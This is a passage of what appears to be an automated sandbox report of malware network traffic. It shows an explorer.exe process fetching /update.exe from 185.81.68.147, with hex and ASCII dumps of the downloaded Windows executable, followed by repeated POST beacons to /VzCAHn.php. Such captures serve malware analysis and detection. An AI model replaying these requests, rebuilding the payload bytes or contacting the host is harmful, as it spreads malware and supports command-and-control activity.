                                                                                                                                                                                                                      Data Ascii: H A_A^^VE3HISyLFHH5N,LHu DNLFH H-t~uME3HIc^Hl$@IH|$HLd$PHt8A fDI;HMAIGHHnHrBHH+u3H|$HHl$@Ld$PtI
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677237988 CET1236INData Raw: 0c 48 89 b4 24 a8 00 00 00 88 84 24 83 00 00 00 e8 35 5d 00 00 48 8b f0 48 85 c0 0f 84 37 02 00 00 45 33 c0 48 8b d0 48 8b cf e8 6f e0 00 00 85 c0 79 18 48 8d 15 20 a0 02 00 48 8d 0d 55 9f 02 00 e8 c4 0d 00 00 e9 0d 02 00 00 4c 8b cf 48 8d 4c 24
                                                                                                                                                                                                                      Data Ascii: H$$5]HH7E3HHoyH HULHL$ XAHsHH_`n'HHuHH(_LLHD$(H D$(LL$8D$,LD$,@
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677249908 CET1236INData Raw: c0 48 89 44 24 50 b9 00 02 00 00 48 8b 47 08 48 89 6c 24 48 48 89 44 24 40 c7 44 24 38 00 00 00 80 c7 44 24 30 00 00 00 80 c7 44 24 28 00 00 00 80 c7 44 24 20 00 00 00 80 ff 15 47 95 02 00 48 89 6c 24 58 4c 8d 05 cb 9c 02 00 48 89 87 38 20 00 00
                                                                                                                                                                                                                      Data Ascii: HD$PHGHl$HHD$@D$8D$0D$(D$ GHl$XLH8 HHAPHD$P3HGHD$HHD$@D$8D$0D$(D$ LP E3HOH@ ULP HOA9LP H( rA
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677261114 CET1236INData Raw: cc cc 40 55 53 56 57 41 56 48 8d ac 24 30 df ff ff b8 d0 21 00 00 e8 57 98 00 00 48 2b e0 48 8b 05 1d bd 03 00 48 33 c4 48 89 85 c0 20 00 00 48 8b d9 4d 8b f0 33 c9 48 8b f2 ff 15 62 8d 02 00 33 d2 48 8d 8d b6 1f 00 00 41 b8 02 01 00 00 48 8b f8
                                                                                                                                                                                                                      Data Ascii: @USVWAVH$0!WH+HH3H HM3Hb3HAHt3HLf@H3HL$X3HD$8A@ ,tHH|$0HHHD$@HIHD$HHHD$PLIHD$0E3H
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677280903 CET1236INData Raw: 02 e8 cc 14 01 00 8b cb e8 a1 1c 01 00 48 89 44 24 28 4c 8d 8c 24 30 04 00 00 4c 8d 05 6d 94 02 00 48 89 7c 24 20 ba 00 04 00 00 48 8d 4c 24 30 e8 e9 f3 ff ff 41 b8 00 04 00 00 48 8d 94 24 30 08 00 00 48 8d 4c 24 30 e8 91 5e 00 00 33 c9 41 b9 30
                                                                                                                                                                                                                      Data Ascii: HD$(L$0LmH|$ HL$0AH$0HL$0^3A0HtLH$0LHT$0{H$0H3H@_^[LIKISMCMK SWHHHH3H$0HI{H|$(HT$0LHD$ A
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677360058 CET1236INData Raw: 10 04 00 48 8b cd ff 15 ae 87 02 00 48 8b 6c 24 60 48 8b 05 aa 10 04 00 49 8b cc ff 15 99 87 02 00 4c 8b 64 24 68 48 8b 05 95 10 04 00 49 8b cd ff 15 84 87 02 00 48 8b 5c 24 70 49 8b c6 48 83 c4 30 41 5f 41 5e 41 5d 5f 5e c3 cc cc cc cc cc cc cc
                                                                                                                                                                                                                      Data Ascii: HHl$`HILd$hHIH\$pIH0A_A^A]_^@VAUAWp`H+H&H3H$PH LHHkLHuHfHIL$hLHuHPckH
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677381039 CET1236INData Raw: 17 80 f9 64 0f 84 02 01 00 00 80 f9 6e 74 09 80 f9 78 0f 85 3a 01 00 00 48 8d 77 12 85 db 0f 85 83 01 00 00 48 8b 8d 18 20 00 00 48 85 c9 74 08 48 8b d6 e8 1e 3c 00 00 48 89 74 24 28 4c 8d 8d 22 20 00 00 4c 8d 05 c3 8a 02 00 c7 44 24 20 5c 00 00
                                                                                                                                                                                                                      Data Ascii: dntx:HwH HtH<Ht$(L" LD$ \H$=(H$u>H HtH6H$D810H6LH" HBduYH$HL$
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.677393913 CET1236INData Raw: 82 74 ff ff ff 48 8d 0d 86 88 02 00 e8 b1 47 00 00 4c 8b bc 24 a8 20 00 00 4c 8b c0 48 85 c0 74 26 0f b6 10 83 ea 30 75 0b 0f b6 50 01 33 c0 0f b6 c8 2b d1 85 d2 49 8b c8 0f 95 c0 88 87 31 30 00 00 e8 c7 0a 01 00 80 bf 20 20 00 00 00 0f 84 a2 01
                                                                                                                                                                                                                      Data Ascii: tHGL$ LHt&0uP3+I10 HWbGHKHHHI;@H" ! LLE=HH$ H$ H$` H3FHp A^_^H7HO
                                                                                                                                                                                                                      Dec 17, 2024 10:15:04.797489882 CET1236INData Raw: 30 5f 5e 5b c3 48 8b cf e8 e1 03 00 00 48 83 c4 30 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 56 b8 60 40 00 00 e8 1f 80 00 00 48 2b e0 48 8b 05 e5 a4 03 00 48 33 c4 48 89 84 24 50 40 00 00 4c 8b b4 24 b0 40 00 00 48 8b f2 48 8d 51
                                                                                                                                                                                                                      Data Ascii: 0_^[HH0_^[@SUVWAV`@H+HH3H$P@L$@HHQHH$PIIHH$P0HH0L$PH$P A\Ht/Hl$@HDL$8HD$0H$P0DL$(HD$ &Hl$0H$P0D$(\HhHD$


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      5192.168.2.849714185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:14.604423046 CET235OUTGET /update.exe HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930721045 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:15 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      Last-Modified: Mon, 16 Dec 2024 19:28:25 GMT
                                                                                                                                                                                                                      ETag: "4c400-629682f2e4e8d"
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 312320
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 4f 7f 60 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 0c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cZ'4A'4A'4A.A$4A'5A-4AHA-4AHA&4AHA&4ARich'4APEdO`g":44@@pr((LPX.text8: `.rdata#P$>@@.data@.pdataLb@@.rsrc(f@@.x64`Zj
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930743933 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 54
                                                                                                                                                                                                                      Data Ascii: T$HL$HHD$ HD$HD$=MZt3VHD$Hc@<HL$ HHH$HD$ H9$s3/D$(HL$ HH9$v3H$8PEt3H$HHL$H8HIj?HI
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930757046 CET1236INData Raw: 24 20 85 c0 75 07 b8 20 00 00 00 eb 02 33 c0 48 83 c4 50 5f c3 cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 ff 15 83 3b 00 00 48 89 44 24 28 48 8b 54 24 48 48 8b 4c 24 28 ff 15 36 3b 00 00 48 89 44 24 20 48 8b 44 24 20 48 83
                                                                                                                                                                                                                      Data Ascii: $ u 3HP_HT$HL$H8HL$@;HD$(HT$HHL$(6;HD$ HD$ H8HT$HL$H8HL$@kHD$(HT$HHL$(kHD$ HD$ H8HHH)EHD$0H%EHD$(H)EHD$ H5EHkHWE
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930769920 CET1236INData Raw: 00 48 8d 0d 78 47 00 00 e8 87 fb ff ff 48 89 05 dc 69 00 00 48 8d 15 75 47 00 00 48 8d 0d 7e 47 00 00 e8 6d fb ff ff 48 89 05 ca 69 00 00 48 8d 15 7b 47 00 00 48 8d 0d 84 47 00 00 e8 53 fb ff ff 48 89 05 b8 69 00 00 48 8d 15 81 47 00 00 48 8d 0d
                                                                                                                                                                                                                      Data Ascii: HxGHiHuGH~GmHiH{GHGSHiHGHG9HiHGHGHiHGHGHiHGHGHpiHGHGH^iHGHGHLiHGHG
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930793047 CET1236INData Raw: 89 05 6e 63 00 00 48 8d 15 2f 49 00 00 48 8d 0d 38 49 00 00 e8 a7 f6 ff ff 48 89 05 5c 63 00 00 48 8d 15 35 49 00 00 48 8d 0d 3e 49 00 00 e8 8d f6 ff ff 48 89 05 8a 62 00 00 48 8d 15 3b 49 00 00 48 8d 0d 4c 49 00 00 e8 73 f6 ff ff 48 89 05 38 63
                                                                                                                                                                                                                      Data Ascii: ncH/IH8IH\cH5IH>IHbH;IHLIsH8cHIIHRIYH&cHOIH`I?HcH]IHnI%HjcHkIH|IHXcHyIHIHFcHIHIHbH
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930805922 CET1120INData Raw: 6c 5e 00 00 e9 81 fe ff ff c7 44 24 44 00 00 00 00 c7 44 24 40 04 00 00 00 48 c7 44 24 20 00 00 00 00 4c 8d 4c 24 40 4c 8d 44 24 44 ba 05 00 00 20 48 8b 4c 24 38 ff 15 0c 5f 00 00 8b 44 24 44 48 89 44 24 68 ff 15 ad 5f 00 00 48 8b 4c 24 68 4c 8b
                                                                                                                                                                                                                      Data Ascii: l^D$DD$@HD$ LL$@LD$D HL$8_D$DHD$h_HL$hLH_HD$XH|$XuHL$8o^HL$Pd^3D$HD$HL$D+L$HHT$XHHLL$`DHHL$8^t|$`vD$`L$HD$HH$L$HHL$8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930821896 CET1236INData Raw: 15 13 5a 00 00 48 8b 4c 24 50 ff 15 90 59 00 00 e9 7c 06 00 00 48 8b 4c 24 50 ff 15 80 59 00 00 48 c7 84 24 70 03 00 00 00 00 00 00 48 8d 84 24 78 03 00 00 48 8b f8 33 c0 b9 c8 04 00 00 f3 aa c7 84 24 a0 03 00 00 0b 00 10 00 48 8d 94 24 70 03 00
                                                                                                                                                                                                                      Data Ascii: ZHL$PY|HL$PYH$pH$xH3$H$pH$(o[uA3HL$`YH$H$HHD$ AL$HH$ ZHDZH$H?EH$aXHD$hH$
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930838108 CET1236INData Raw: 00 0f b7 04 42 66 23 c1 0f b7 c0 48 8b 8c 24 70 0a 00 00 03 01 89 84 24 84 0a 00 00 48 c7 84 24 88 0a 00 00 00 00 00 00 8b 84 24 84 0a 00 00 48 8b 8c 24 10 01 00 00 48 03 c8 48 8b c1 48 c7 44 24 20 00 00 00 00 41 b9 08 00 00 00 4c 8d 84 24 88 0a
                                                                                                                                                                                                                      Data Ascii: Bf#H$p$H$$H$HHHD$ AL$HH$ OVHD$XH$HHH$$H$HHHD$ AL$HH$ UuA3HL$`pTXH$H
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931005001 CET1236INData Raw: 00 e8 d6 0c 00 00 48 8d 0d 43 3d 00 00 e8 ca 0c 00 00 48 8d 0d 4f 3d 00 00 e8 be 0c 00 00 48 8d 0d 5b 3d 00 00 e8 b2 0c 00 00 48 8d 0d 6f 3d 00 00 e8 a6 0c 00 00 48 8d 15 fb 52 00 00 48 8d 0d 74 3d 00 00 e8 23 08 00 00 b9 8c 0a 00 00 ff 15 14 50
                                                                                                                                                                                                                      Data Ascii: HC=HO=H[=Ho=HRHt=#P3H8HL$H(3tkpO3H(H8Qt;D$ QHT$ HQt|$ tD$$D$$D$$2H
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931085110 CET1236INData Raw: c9 ff 15 85 4d 00 00 48 89 84 24 78 02 00 00 48 8b 84 24 78 02 00 00 48 89 84 24 60 02 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 00 00 00 00 45 33 c9 4c 8d 05 46 fd ff ff 33 d2 33 c9 ff 15 48 4d 00 00 48 89 84 24 58 02 00 00 48 8b 84 24 58 02
                                                                                                                                                                                                                      Data Ascii: MH$xH$xH$`HD$(D$ E3LF33HMH$XH$XH$hHD$(D$ E3L)33MH$H$H$pAAH$`3$K3H3DL$ LD$HT$HL$
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.051835060 CET1236INData Raw: 48 8d 4c 24 70 ff 15 3d 49 00 00 48 8d 54 24 70 48 8d 0d e1 34 00 00 e8 a8 fe ff ff b0 01 48 81 c4 90 04 00 00 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 83 7c 24 30 00 74 13 41 b8 00 80 00 00 33 d2 48 8b 4c 24 30
                                                                                                                                                                                                                      Data Ascii: HL$p=IHT$pH4H_HL$H(H|$0tA3HL$0pFH(L$H(D$0AA03*FH(HhH4HD$0H=5HD$@D$8HD$HHD$ AE3HT$0HsHD$P|$Pu:D$(HD


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      6192.168.2.849715185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.281202078 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:17.401243925 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:18.919783115 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:17 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      7192.168.2.849716185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.156919003 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:19.277745962 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.606235981 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:19 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      8192.168.2.849717185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.843328953 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:20.963258028 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.451704025 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:21 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      9192.168.2.849718185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.713570118 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:22.833981991 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.355389118 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:23 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      10192.168.2.849719185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.581036091 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:24.701143026 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.012465000 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:25 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      11192.168.2.849720185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.249710083 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:26.369688034 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:27.866368055 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:26 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      12192.168.2.849721185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.117160082 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:28.238224983 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.714298010 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:28 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      13192.168.2.849722185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:29.937633038 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:30.060058117 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.386472940 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:30 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      14192.168.2.849723185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.609347105 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:31.729286909 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.076090097 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:32 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      15192.168.2.849724185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.312313080 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:15:33.432239056 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:15:34.915150881 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:15:33 GMT
